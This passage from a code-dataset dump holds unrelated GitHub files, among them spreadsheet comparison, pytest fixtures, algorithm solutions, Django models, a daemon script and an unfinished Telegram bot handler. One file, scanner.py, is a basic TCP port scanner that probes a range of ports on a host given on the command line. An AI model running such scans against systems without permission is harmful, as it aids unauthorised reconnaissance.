')\n\nlinhas_aba1 = aba1.max_row\ncolunas_aba1 = aba1.max_column\n\nwhile True:\n try:\n planilha2 = input('Digite o nome da planilha desatualizada: ')\n planilha2 = openpyxl.load_workbook(filename=planilha2 + '.xlsx')\n aba2 = planilha2.active\n break\n except:\n print('Planilha nao encontrada, favor digitar novamente: ')\n\nlinhas_aba2 = aba2.max_row\ncolunas_aba2 = aba2.max_column\n\ncoluna = input('Digite a coluna a ser analisada: ').upper()\ncoluna = descobre_numero(coluna)\n\nwhile True:\n inicio = int(input('As planilhas apresentam cabecalho?\\n1 - Nao\\n2 - Sim\\n'))\n if inicio == 1 or inicio == 2:\n break\n else:\n print('Por favor, digite o numero referente a resposta')\n\nnome_planilha = input('Digite o nome da planilha a ser salva: ')\n\nplanilha3 = openpyxl.Workbook()\naba3 = planilha3.active\n\nlista_colunas = descobre_colunas(colunas_aba1 + 1)\n\nif inicio == 1:\n contador = 1\n \nelse:\n contador = 2\n for i in range(1, colunas_aba1 + 1):\n aba3.cell(1, i, value=aba1.cell(1, i).value)\n aba3.cell(1, colunas_aba1 + 1, value='Status')\n\nfor i in range(inicio, linhas_aba1 + 1):\n valor_analise = aba1.cell(i, coluna).value\n k = inicio\n while k <= linhas_aba2:\n if valor_analise == aba2.cell(k, coluna).value:\n for j in range(1, colunas_aba1 + 1):\n if aba1.cell(i, j).value != aba2.cell(k, j).value:\n for h in range(1, colunas_aba1 + 1):\n aba3.cell(contador, h, value=aba1.cell(i, h).value)\n aba3.cell(contador + 1, h, value=aba2.cell(k, h).value)\n if aba1.cell(i, h).value != aba2.cell(k, h).value:\n aba3.cell(contador, h).font = openpyxl.styles.Font(color=\"00FF0000\")\n aba3.cell(contador, h).fill = openpyxl.styles.PatternFill(fill_type='solid', start_color='FFD890', end_color='FFD890')\n aba3.cell(contador + 1, h).font = openpyxl.styles.Font(color=\"000000FF\")\n aba3.cell(contador + 1, h).fill = openpyxl.styles.PatternFill(fill_type='solid', start_color='ADD8E6', end_color='ADD8E6')\n else:\n aba3.cell(contador, colunas_aba1 + 1, value='Desatualizado')\n aba3.cell(contador + 1, colunas_aba1 + 1, 
value='Atualizado')\n contador += 2\n break\n aba2.delete_rows(k)\n linhas_aba2 -= 1\n k -= 1\n break\n k += 1\n else:\n for h in range(1, colunas_aba1 + 1):\n aba3.cell(contador, h, value=aba1.cell(i, h).value)\n else:\n aba3.cell(contador, colunas_aba1 + 1, value='Adicionado')\n contador += 1\n\nlinhas_aba2 = aba2.max_row\n\nfor i in range(inicio, linhas_aba2 + 1):\n for j in range(1, colunas_aba2 + 1):\n aba3.cell(contador, j, value=aba2.cell(i, j).value)\n else:\n aba3.cell(contador, colunas_aba1 + 1, value='Excluido')\n contador += 1\n\nplanilha3.save(nome_planilha + '.xlsx')\n\nprint('Programa Finalizado')\n\ntime.sleep(3.5)\n","repo_name":"Boreias/Verificador_de_Planilhas","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4577,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12284709615","text":"import os\nimport pytest\nfrom pytest_bdd import given\nfrom sqlalchemy import create_engine\n\nimport journal\nfrom test_journal import login_helper\n\n\nTEST_DATABASE_URL = os.environ.get(\n 'DATABASE_URL',\n 'postgresql://gracehatamyar@localhost:5432/test-learning-journal'\n )\nos.environ['DATABASE_URL'] = TEST_DATABASE_URL\n\n\n@pytest.fixture(scope='session')\ndef connection(request):\n engine = create_engine(TEST_DATABASE_URL)\n journal.Base.metadata.create_all(engine)\n # create connection to our database\n # this opens a transaction that lasts for the scope\n # of the entire session\n connection = engine.connect()\n journal.DBSession.registry.clear()\n # bind this in the name space of journal\n journal.DBSession.configure(bind=connection)\n journal.Base.metadata.bind = engine\n request.addfinalizer(journal.Base.metadata.drop_all)\n return connection\n\n\n@pytest.fixture()\ndef db_session(request, connection):\n # starts a new transaction inside the already open transaction\n from transaction import abort\n trans = connection.begin()\n # every test has a transaction that's open for the duration\n # of the test, and rolls back when the test is completed\n request.addfinalizer(trans.rollback)\n request.addfinalizer(abort)\n\n from journal import DBSession\n return DBSession\n\n\n@pytest.fixture()\ndef app(db_session):\n from journal import main\n from webtest import TestApp\n app = main()\n return TestApp(app)\n\n\n@pytest.fixture()\ndef homepage(app):\n response = app.get('/')\n return response\n\n\n@pytest.fixture()\ndef entry_page(homepage):\n redirect = homepage.click(description='Read', index=0)\n return redirect\n\n\n@pytest.fixture()\ndef edit_page(app):\n response = app.get('/edit/0', status=403)\n return response\n\n\n# @pytest.fixture()\n# def author(app):\n# username, password = ('admin', 'secret')\n# login_helper(username, password, app)\n# response = app.get('/')\n# return response\n\n\n# @pytest.fixture()\n# def edit_page_author(author):\n# response = app.get('/edit/0')\n# return response\n","repo_name":"gatita/learning-journal","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"34363511457","text":"# Implementation\n# Snail spiral\nimport sys\n\ninput = sys.stdin.readline\nn = int(input())\nm = int(input())\n\n# https://velog.io/@hygge/Python-%EB%B0%B1%EC%A4%80-1913-%EB%8B%AC%ED%8C%BD%EC%9D%B4-Brute-Force for reference\n\nboard = [[0] * n for _ in range(n)]\n\ndr = [0, 1, 0, -1] # right, down, left, up order\ndc = [1, 0, -1, 0]\n\nr = n//2 # starting row\nc = n//2 # starting 
column\nnum = 1 # number to place at the current position, incremented by 1 each step\nlength = 0 # how far to move in the current direction; the same work could be done with a for loop.\n\nboard[r][c] = num\n\nwhile True:\n for i in range(4):\n for _ in range(length): # move one cell at a time in the given direction, filling in numbers\n r += dr[i]\n c += dc[i]\n num += 1\n board[r][c] = num\n if num == m: # store the position of the number we are looking for\n ans = [r+1, c+1]\n\n if r == c == 0:\n break\n r -= 1\n c -= 1\n length += 2\n\nfor i in range(n):\n print(*board[i])\nprint(*ans)\n","repo_name":"kimssumin/algorithm","sub_path":"BOJ_1913.py","file_name":"BOJ_1913.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37482999542","text":"from django.http import HttpResponse\nfrom django.views.generic import View\nimport json\nfrom systems.models import Machine\n\n\nclass MachineAjaxUpdate(View):\n\n def get(self, _):\n data = {}\n for machine in Machine.objects.all():\n data[machine.id] = {\n 'security': machine.security_packages,\n 'total': machine.total_packages,\n 'reboot': machine.requires_restart\n }\n\n return HttpResponse(content=json.dumps(data), content_type='application/json')\n","repo_name":"pombredanne/butler-1","sub_path":"butler/systems/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"70376376831","text":"class Solution:\n mod = 10**9+7\n def sumSubseqWidths(self, A):\n \"\"\"\n :type A: List[int]\n :rtype: int\n \"\"\"\n A.sort()\n ans = 0\n for i, x in enumerate(A):\n ans = (ans + x * pow(2, i, self.mod) - x * pow(2, len(A)-i-1, self.mod)) % self.mod\n return ans\nprint(Solution().sumSubseqWidths([1,2,3]))","repo_name":"goagain/Contests","sub_path":"leetcode/891/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"5150821617","text":"from langchain import LLMChain\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.schema import (\n AIMessage,\n HumanMessage,\n SystemMessage,\n)\nfrom langchain.prompts.chat import (\n ChatPromptTemplate,\n SystemMessagePromptTemplate,\n HumanMessagePromptTemplate,\n)\nimport openai\nfrom . 
import (\n OPENAI_API_KEY,\n SYSTEM_TEMPLATE,\n HUMAN_TEMPLATE,\n QUESTION_2,\n DSL_2,\n QUESTION_1,\n DSL_1,\n)\n\n\ndef build_dsl_template():\n system_message_prompt = SystemMessage(content=SYSTEM_TEMPLATE)\n human_message_prompt = HumanMessagePromptTemplate.from_template(HUMAN_TEMPLATE)\n\n chat_prompt = ChatPromptTemplate.from_messages(\n [system_message_prompt, human_message_prompt]\n )\n\n return chat_prompt\n\n\ndef dsl_template(question: str):\n chat_prompt = build_dsl_template()\n msg = chat_prompt.format_messages(\n question=question,\n )\n return msg\n\n\ndef dsl_chain(question: str, *, model: str):\n chat = ChatOpenAI(\n model=model,\n openai_api_key=OPENAI_API_KEY,\n )\n\n chat_prompt = build_dsl_template()\n\n chain = LLMChain(\n llm=chat,\n prompt=chat_prompt,\n )\n ans = chain.run(\n question=question,\n )\n return ans\n","repo_name":"kingh0730/build_from_the_stack","sub_path":"dataset_apps_decode_gen_input/src/dataset_apps_decode_gen_input/langchain_dsl/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"25831799946","text":"from django.db import models\nfrom django.urls import reverse\nfrom django.contrib.auth.models import User\nfrom django.core.validators import MaxValueValidator, MinValueValidator\nfrom django.db.models.fields import BooleanField, TextField\n\n# Create your models here.\n\nMEDIUMTYPE = (\n (\"CH\", \"Charcoal\"),\n (\"CP\", \"Colored Pencil\"),\n (\"IA\", \"Alcohol Ink\"),\n (\"II\", \"India Ink\"),\n (\"IW\", \"Water-based Ink\"),\n (\"GR\", \"Graphite\"),\n (\"MA\", \"Alcohol Marker\"),\n (\"MW\", \"Water-based Marker\"),\n (\"PA\", \"Acrylic Paint\"),\n (\"PG\", \"Gouache Paint\"),\n (\"PO\", \"Oil Paint\"),\n (\"PW\", \"Watercolor Paint\"),\n (\"PH\", \"Hard Pastel\"),\n (\"OP\", \"Oil Pastel\"),\n (\"PP\", \"Pan Pastel\"),\n (\"PS\", \"Soft Pastel\"),\n (\"BP\", \"Ballpoint Pen\"),\n (\"PB\", \"Brush Pen\"),\n (\"GE\", \"Gel Pen\"),\n (\"PL\", \"Fineliner Pen\"),\n (\"PF\", \"Fountain Pen\"),\n (\"PE\", \"Paint Pen\"),\n)\n\nclass Artsupply(models.Model):\n name = models.CharField(max_length = 100)\n brand = models.CharField(max_length = 100)\n medium = models.CharField(\n max_length=2,\n choices=MEDIUMTYPE,\n default=MEDIUMTYPE[0][0])\n familiarity = models.IntegerField(\n \"Familiarity on a scale of 0 (first time using this material) to 5 (Regular professional use)\",\n default=0,\n validators=[MaxValueValidator(5), MinValueValidator(0)]\n )\n description = TextField(max_length=500)\n favorite = BooleanField(\"Check this box if you'll use it again\")\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n\n def __str__(self):\n return self.name\n\n def get_absolute_url(self):\n return reverse(\"artsupplies_detail\", kwargs={\"artsupply_id\": self.id})\n\n\nclass Photo(models.Model):\n url = models.CharField(max_length=250)\n artsupply = models.ForeignKey(Artsupply, on_delete=models.CASCADE)\n\n def __str__(self):\n return f\"Photo for artsupply_id: {self.artsupply_id} @{self.url}\"","repo_name":"tayannewest/swatchdog","sub_path":"main_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"19214642044","text":"import os\nimport logging\nimport time\nfrom daemonize import Daemonize\nimport argparse\nimport signal\n\nDESCRIPTION = \"\"\"\nRun the SG Jira web app as a Linux 
service.\n\nThis script can be used with a systemd setup and handles the usual start, stop,\nrestart and status actions.\n\nThe running process daemonizes itself and its pid is stored in a pid file.\n\"\"\"\n\nlogger = logging.getLogger(\"service\")\n# Ensure basic logging is always enabled\nlogging.basicConfig(format=\"%(levelname)s:%(name)s:%(message)s\")\nlogger.setLevel(logging.DEBUG)\n\n\ndef status(pid_file):\n \"\"\"\n Return the pid of the service if it is running.\n\n :param str pid_file: Full path to the pid file used by the service.\n :returns: The process pid as an int if it is running, `None` otherwise.\n \"\"\"\n if not os.path.exists(pid_file):\n return None\n\n pid = None\n with open(pid_file, \"r\") as pf:\n pid = pf.read().strip()\n\n if not pid:\n logger.error(\"Unable to retrieve pid from %s\" % pid_file)\n return None\n\n if not pid.isdigit():\n logger.error(\"Invalid pid %s read from %s\" % (pid, pid_file))\n return None\n\n pid = int(pid)\n\n try:\n # Send 0 signal to check if the process is alive.\n os.kill(pid, 0)\n except OSError as e:\n logger.debug(\"%s\" % e, exc_info=True)\n return None\n return pid\n\n\ndef start(pid_file, port_number, settings, log_file=None):\n \"\"\"\n Start the service.\n\n :param str pid_file: Full path to the pid file used by the service.\n :param int port_number: The port number for the web app to listen on.\n :param str settings: Full path to settings file for the web app.\n :param str log_file: An optional log file to use for the daemon output. By\n default the daemon uses a syslog handler.\n \"\"\"\n keep_fds = []\n if log_file:\n fh = logging.FileHandler(log_file, \"a\")\n fh.setLevel(logging.INFO)\n logger.addHandler(fh)\n keep_fds = [fh.stream.fileno()]\n\n # Inline function so we can pass a callable to Daemonize with our parameters\n # set.\n def start_wep_app():\n import logging\n\n logger = logging.getLogger(\"service\").getChild(\"sg_jira\")\n logger.info(\"Starting wep app...\")\n try:\n import webapp\n\n webapp.run_server(port=port_number, settings=settings)\n except Exception as e:\n logger.exception(e)\n logger.warning(\"bye\")\n\n logger.info(\"Starting daemon with pid file %s\" % pid_file)\n daemon = Daemonize(\n app=\"sg_jira\",\n pid=pid_file,\n action=start_wep_app,\n keep_fds=keep_fds,\n logger=logger if log_file else None,\n )\n daemon.start()\n\n\ndef stop(pid_file):\n \"\"\"\n Stop the service if it is running.\n\n :param str pid_file: Full path to the pid file used by the service.\n \"\"\"\n # Get the running process pid, if any\n pid = status(pid_file)\n if not pid:\n return\n\n try:\n os.kill(pid, signal.SIGTERM)\n # Give the process some time to exit nicely\n time.sleep(0.1)\n # Send a SIGKILL signal but ignore errors\n try:\n os.kill(pid, signal.SIGKILL)\n except OSError:\n pass\n except OSError as e:\n # Catch the error in case the process exited between our check and our\n # attempt to stop it.\n logger.warning(\n \"Unable to stop process %d, assuming it is already stopped: %s\" % (pid, e)\n )\n logger.debug(str(e), exc_info=True)\n # Clean up\n if os.path.exists(pid_file):\n os.remove(pid_file)\n\n\ndef main():\n parser = argparse.ArgumentParser(description=DESCRIPTION)\n parser.add_argument(\n \"--pid_file\",\n default=\"/tmp/sg_jira.pid\",\n help=\"Full path to a file where to write the process pid.\",\n )\n parser.add_argument(\n \"--log_file\", help=\"Full path to a file where to log output.\",\n )\n parser.add_argument(\n \"--port\", type=int, default=9090, help=\"The port number to listen on.\",\n 
)\n parser.add_argument(\"--settings\", help=\"Full path to settings file.\", required=True)\n parser.add_argument(\n \"action\",\n choices=[\"start\", \"stop\", \"restart\", \"status\"],\n help=\"Action to perform.\",\n )\n args = parser.parse_args()\n\n if args.action == \"start\":\n start(\n args.pid_file, args.port, os.path.abspath(args.settings), args.log_file,\n )\n elif args.action == \"stop\":\n stop(args.pid_file)\n elif args.action == \"status\":\n pid = status(args.pid_file)\n if pid:\n logger.info(\"Service is running with pid %d\" % pid)\n else:\n logger.info(\"Service is not running.\")\n elif args.action == \"restart\":\n stop(args.pid_file)\n start(\n args.pid_file, args.port, os.path.abspath(args.settings), args.log_file,\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"shotgunsoftware/sg-jira-bridge","sub_path":"service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":4937,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"60"} +{"seq_id":"7938638179","text":"nota1 = float(input('Digite a primeira nota: '))\nnota2 = float(input('Digite a segunda nota: '))\nmedia = (nota1 + nota2) / 2\nprint('A média das notas {} e {} é {}'.format(nota1,nota2,media))\n\nif media < 5:\n print('\\033[31m=== REPROVADO ===\\033[m')\nelif media >= 5 and media < 7:\n print('\\033[31m=== RECUPERAÇÃO ===\\033[m')\nelif media >= 7 and media <= 10:\n print('\\033[31m=== APROVADO ===\\033[m')\n","repo_name":"Lucas-Chaves-Junker/Projetos-em-Python","sub_path":"Exercícios/Exercícios/ex040 - Aquele clássico da Média.py","file_name":"ex040 - Aquele clássico da Média.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"9653295193","text":"from nltk.corpus import stopwords\r\nimport dataclean\r\nimport pickle\r\n\r\npath='data\\\\lg.pkl'\r\nmodel = pickle.load(open(path, 'rb'))\r\npath1='data\\\\count.pkl'\r\nvector=pickle.load(open(path1,'rb'))\r\ndc = dataclean.Dataclean()\r\n\r\ndef find(x):\r\n x = dc.lower_case_convertion(x)\r\n x = dc.remove_punctuation(x)\r\n x = dc.numtowords(x)\r\n x = dc.lower_case_convertion(x)\r\n x = dc.remove_html_tags_beautifulsoup(x)\r\n x = dc.remove_urls(x)\r\n x = dc.accented_to_ascii(x)\r\n x = dc.remove_extra_spaces(x)\r\n x = dc.remove_single_char(x)\r\n stop = stopwords.words('english')\r\n x= ' '.join([word for word in x.split() if word not in (stop)])\r\n x = dc.emoji_words(x)\r\n x = dc.lemmatization(x)\r\n x = [x]\r\n vect = vector.transform(x).toarray()\r\n my_prediction = model.predict(vect)\r\n val = my_prediction[0]\r\n label={0:'religion', 
socket.SOCK_STREAM)\n\t\t\tsocket.setdefaulttimeout(1)\n\t\t\tresult = s.connect_ex((target, port))\n\t\t\tif result == 0:\n\t\t\t\tprint(f\"Port {port} status: open\")\n\t\t\ts.close()\n\texcept KeyboardInterrupt:\n\t\tprint(\"Exiting program\")\n\t\tsys.exit()\n\texcept socket.gaierror:\n\t\tprint(\"Hostname couldn't be resolved\")\n\t\tsys.exit()\n\texcept socket.error:\n\t\tprint(\"Couldn't connect to server\")\n\t\tsys.exit()\n\t\t\t\nelse:\n\tprint(\"Invalid number of arguments\")\n\tprint(\"Syntax: python3 scanner.py <target>\")\n","repo_name":"blacklantern047/PortScanner","sub_path":"scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"31807147894","text":"\n\n#'/home/tati/Рабочий стол/DataSet2/dev-clean (1)/LibriSpeech/dev-clean/ 422/137823/251-137823.trans.txt'\nimport csv\nimport os\n\nfilename11 = '/home/tati/Рабочий стол/DataSet2/dev-clean (1)/LibriSpeech/dev-clean/'\nfilename111 = '8842'\nfilename1111 = '304647'\nfilename11111 = '.trans.txt'\nfilename1 = filename11 + filename111 + '/' + filename1111 + '/' + filename111 + '-' + filename1111 + filename11111\n\nfilename2 = 'texts/'\nfilename3 = '/home/tati/Рабочий стол/DataSet2/dev-clean (1)/LibriSpeech/dev-clean/' + filename111 + '/' + filename1111 + '/'\n\nfilename4 = 'audio_clips/'\n\n\nwith open(filename1, 'r+', newline='') as csv_file:\n reader = csv.reader(csv_file, delimiter=\"\\n\")\n for row in reader:\n i = row[0]\n to_txt = i.split(' ', 1)\n name = to_txt[0]\n texts = to_txt[1]\n with open(filename2 + name + '.csv', 'w+') as txt:\n txt.write(name + '|' + texts)\n # audio_files_to_directories\n # AUDIO\n if not os.path.isdir(filename4 + name):\n os.mkdir(filename4 + name)\n os.replace(filename3 + name + '.flac', filename4 + name + '/' + name + '.flac')\n# rename the audio files from flac to wav\nlist_dir = os.listdir(path=\"audio_clips\")\n\nfor i in range(len(list_dir)):\n if os.path.exists('audio_clips/' + list_dir[i] + '/' + list_dir[i] + '.flac'):\n os.rename('audio_clips/' + list_dir[i] + '/' + list_dir[i] + '.flac', 'audio_clips/' + list_dir[i] + '/' + list_dir[i] + '.wav')\n\n\n","repo_name":"xiill/processing_dataset","sub_path":"DataSet3_LibriSpeech/from_txt_to_csv.py","file_name":"from_txt_to_csv.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"25978966998","text":"import random\nfrom game.move_actors_action import MoveActorsAction\nfrom game import constants\nfrom game.action import Action\nfrom game.audio_service import AudioService\nfrom game.point import Point\n\nclass HandleEdgeBounce(Action):\n \"\"\"A code template for handling edge bounces. 
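`connect_ex` is the exception-free variant of `connect`: it returns an errno instead of raising, which is why the scanner simply compares the result with 0. A compact sketch of the same probe with a per-socket timeout rather than the process-wide default (host and ports are illustrative):

```python
import socket

def probe(host: str, port: int, timeout: float = 1.0) -> bool:
    # A context manager guarantees the socket is closed even on error paths.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)  # per-socket timeout instead of setdefaulttimeout
        return s.connect_ex((host, port)) == 0  # 0 means the TCP handshake succeeded

if __name__ == "__main__":
    for port in (22, 80, 443):  # illustrative ports
        print(port, "open" if probe("127.0.0.1", port) else "closed")
```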
The responsibility of this class of objects is to update the game state when an actor reaches the edge of the screen.\n \n Stereotype:\n Controller\n \"\"\"\n def __init__(self, physics_service):\n super().__init__()\n self._physics_service = physics_service\n self._move_actors_action = MoveActorsAction()\n\n def execute(self, cast):\n \"\"\"Executes the action using the given actors.\n\n Args:\n cast (dict): The game actors {key: tag, value: list}.\n \"\"\"\n audio_service = AudioService()\n\n text_background = cast[\"text_background\"][0]\n\n position = text_background.get_position()\n x = position.get_x()\n\n if x < 0:\n dx = 0\n dy = 0\n \n velocity = Point(dx, dy)\n\n text_background.set_velocity(velocity)","repo_name":"Lizzie-hun/cse210-project","sub_path":"typingGame/game/handle_edge_bounce.py","file_name":"handle_edge_bounce.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"43867983550","text":"def pivotedSearch(arr, key):\n n = len(arr)-1\n\n pvt = findPivot(arr, 0, n)\n\n if pvt == -1:\n return binarySearch(arr, 0, n, key)\n\n if arr[pvt] == key:\n return pvt\n if arr[0] <= key:\n return binarySearch(arr, 0, pvt-1, key)\n return binarySearch(arr, pvt+1, n, key)\n\n\n\ndef findPivot(arr, low, high):\n\n if high < low:\n return -1\n\n if high == low:\n return low\n \n mid = (low+high)//2\n\n if mid > low and arr[mid] < arr[mid-1]:\n return mid - 1\n if mid < high and arr[mid] > arr[mid+1]:\n return mid\n if arr[low]>arr[mid]:\n return findPivot(arr, low, mid-1)\n return findPivot(arr, mid+1, high)\n \n\ndef binarySearch(arr, low, high, key):\n\n if high < low:\n return -1\n \n while low <= high:\n mid = (low+high)//2\n if arr[mid] == key:\n return mid\n elif arr[mid] > key:\n high = mid - 1\n else:\n low = mid + 1\n return -1\n\ndef search(arr, low, high, key):\n if low > high:\n return -1\n \n mid = (low+high)//2\n\n if arr[mid] == key:\n return mid\n \n if arr[low] <= arr[mid]:\n\n if key >= arr[low] and key <= arr[mid]:\n return search(arr, low, mid-1, key)\n return search(arr, mid+1, high, key)\n \n if key >= arr[mid] and key <= arr[high]:\n return search(arr, mid+1, high, key)\n return search(arr, low, mid-1, key)\n\n# direct search without explicitly finding the pivot\ndef searchw(arr, target):\n l,r = 0, len(arr)-1\n\n while l<=r:\n mid = (l+r)//2\n\n if arr[mid] == target:\n return mid\n \n if arr[l] <= arr[mid]:\n if target >= arr[l] and target <= arr[mid]:\n r = mid -1\n else:\n l = mid+1\n else:\n if target >= arr[mid] and target<= arr[r]:\n l = mid + 1\n else:\n r = mid -1 \n return -1\n\n\nif __name__ == \"__main__\":\n arr = [5,6,7,8,9,10,0,1,2,3,4]\n\n key = 3\n\n idx = pivotedSearch(arr, key)\n print(idx)\n\n id2 = search(arr, 0, len(arr)-1, key)\n print(id2)\n\n id2 = searchw(arr, key)\n print(id2)","repo_name":"abhij215/DSA","sub_path":"03_Searching/rotated&sorted.py","file_name":"rotated&sorted.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"38413228445","text":"def getZeroes(a, b, c):\r\n from math import sqrt\r\n\r\n try:\r\n alpha = str((-b + Decimal(str(sqrt(pow(b, 2) - 4*a*c)))) / (2*a))\r\n beta = str((-b - Decimal(str(sqrt(pow(b, 2) - 4*a*c)))) / (2*a))\r\n except ValueError:\r\n alpha = 'i'\r\n beta = 'i'\r\n\r\n return alpha, beta\r\n\r\nfrom decimal import Decimal\r\nprint()\r\nprint(\"Enter the values of a, b and c, \\nassuming your equation is of the form ax^2 + bx + c \\nwhere the variable is x and a, b and c are 
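All three rotated-array searches should agree with a plain linear scan on duplicate-free input. A quick randomized check sketch, assuming it runs in the same module as the functions above (the harness itself is not part of the original file):

```python
import random

def linear(arr, key):
    # Reference implementation: index of key, or -1 when absent.
    return arr.index(key) if key in arr else -1

def check(trials: int = 1000) -> None:
    for _ in range(trials):
        n = random.randint(1, 12)
        base = sorted(random.sample(range(50), n))  # unique, sorted values
        k = random.randrange(n)
        arr = base[k:] + base[:k]                   # rotate by k positions
        key = random.choice(arr + [-1])             # -1 is never present
        got = search(arr, 0, len(arr) - 1, key)     # the recursive variant above
        assert got == linear(arr, key), (arr, key, got)

# check()  # pivotedSearch and searchw can be exercised the same way
```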
constants.\\n\")\r\n\r\nx2coeff = Decimal(input(\"a : \"))\r\nx1coeff = Decimal(input(\"b : \"))\r\nx0coeff = Decimal(input(\"c : \"))\r\n\r\nprint(\"\\nZeroes :\", getZeroes(x2coeff, x1coeff, x0coeff))\r\n\r\ninput('\\n{Hit enter to exit}... ')\r\n","repo_name":"wolfrust/UtzX","sub_path":"Math/findZeroesOfQuadraticEquation.py","file_name":"findZeroesOfQuadraticEquation.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"72283749951","text":"# Simple script to calculate halo/subhalo mass functions from hdf5 \n# \n# Below run gives mass functions of the Micro-Uchuu simulation at z=0 \n# python uchuu_h5_mfunc.py MicroUchuu_halolist_z0p00.h5 mfunc.pdf \n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport h5py\nimport sys\n\nargs = sys.argv\ninputfile = args[1]\noutputfile = args[2]\n\nhf = h5py.File( inputfile, 'r')\nmvir = np.array( hf['Mvir'])\npid = np.array(hf['pid'])\nhf.close()\n\nmvir_halo = mvir[pid==-1]\nmvir_subhalo = mvir[pid!=-1]\n\nbins0 = np.logspace( 8, 16, 33)\nn_halo, bins = np.histogram( mvir_halo, bins=(bins0))\nn_subhalo, bins = np.histogram( mvir_subhalo, bins=(bins0))\n\nmbins = np.zeros_like(n_halo)\nfor i in range( len(bins)-1):\n mbins[i] = np.sqrt( bins[i] * bins[i+1])\n\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.plot( mbins, n_halo, \"o-\", label=\"halo\")\nplt.plot( mbins, n_subhalo, \"s-\", label=\"subhalo\")\nplt.legend()\nplt.savefig( outputfile)\n","repo_name":"uchuuproject/uchuu_analysis","sub_path":"uchuu_h5_mfunc.py","file_name":"uchuu_h5_mfunc.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"60"} +{"seq_id":"5645351144","text":"import asyncio\nimport logging\nimport random\n\nfrom aiogram import types\n\nfrom bot.misc import dp, redis\nfrom bot.utils import get_photo_from_message\nfrom config.settings import settings\nfrom schemas import Image\nfrom utils.serializers import ImageRedisSerializer\nfrom bot.misc import bot\n\nlogger = logging.getLogger(__name__)\n\n\nasync def _duplicate_warn(chat_id: int, sender_id: int, sender_message_id: int, original_message_id: int):\n async def _bro():\n await bot.send_message(\n chat_id=chat_id,\n text=f'Hey, {sender_id}, bro, seems you duplicated this one',\n reply_to_message_id=original_message_id,\n )\n\n async def _stickerochek():\n await bot.send_sticker(\n chat_id=chat_id,\n sticker=random.choice([\n 'CAACAgIAAx0CYy9UggADMGGkOdn5_lKMm0v2lBEG8XbLTwJHAAIzAAPYahYQBqWljQKJdpAiBA',\n 'CAACAgIAAx0CYy9UggADM2GkOm85app0Wx1Xqypok7l_IH6kAAI0AAPYahYQKdZ6LYBoGIkiBA',\n 'CAACAgIAAx0CYy9UggADNGGkOn-wZfdx4gNuG3uTLVZyraX_AAI6AAPYahYQflbGPWwW2VoiBA',\n 'CAACAgIAAx0CYy9UggADNWGkOpiMSXPwNYNjtPOKZMu1nKJVAAI7AAPYahYQhe2Te5NF-mEiBA',\n 'CAACAgIAAx0CYy9UggADNmGkOq7pTv4TnoX2A771WwUnAAEWsQACHwAD2GoWEDAFXgn-vPZ4IgQ',\n 'CAACAgIAAx0CYy9UggADN2GkOvSGoYiGxxZ_L_z25mhmQa1jAAIeAAPYahYQueCh9mNLrzEiBA',\n 'CAACAgIAAx0CYy9UggADPWGkPaH7jqm0cFhM6KRhSf61pttsAAINAwACEzmPEWPVqCB_X-3SIgQ', # boi\n 'CAACAgQAAx0CYy9UggADPmGkPcCpun-P3W_iMhWeqwfaX45MAAITMgACw4FiCcvUltlN1aeaIgQ', # angry cat\n 'CAACAgQAAx0CYy9UggADP2GkPeuyBpKjMvnEHl7wteqDRjvDAAJnMgACw4FiCVXDFX7LffiiIgQ', # sniff\n ]),\n reply_to_message_id=sender_message_id,\n )\n await bot.send_message(\n chat_id=chat_id,\n text='.',\n reply_to_message_id=original_message_id,\n )\n\n await random.choices([_bro, _stickerochek], [0.15, 0.85])[0]()\n\n\n@dp.message_handler(\n content_types=['photo'],\n 
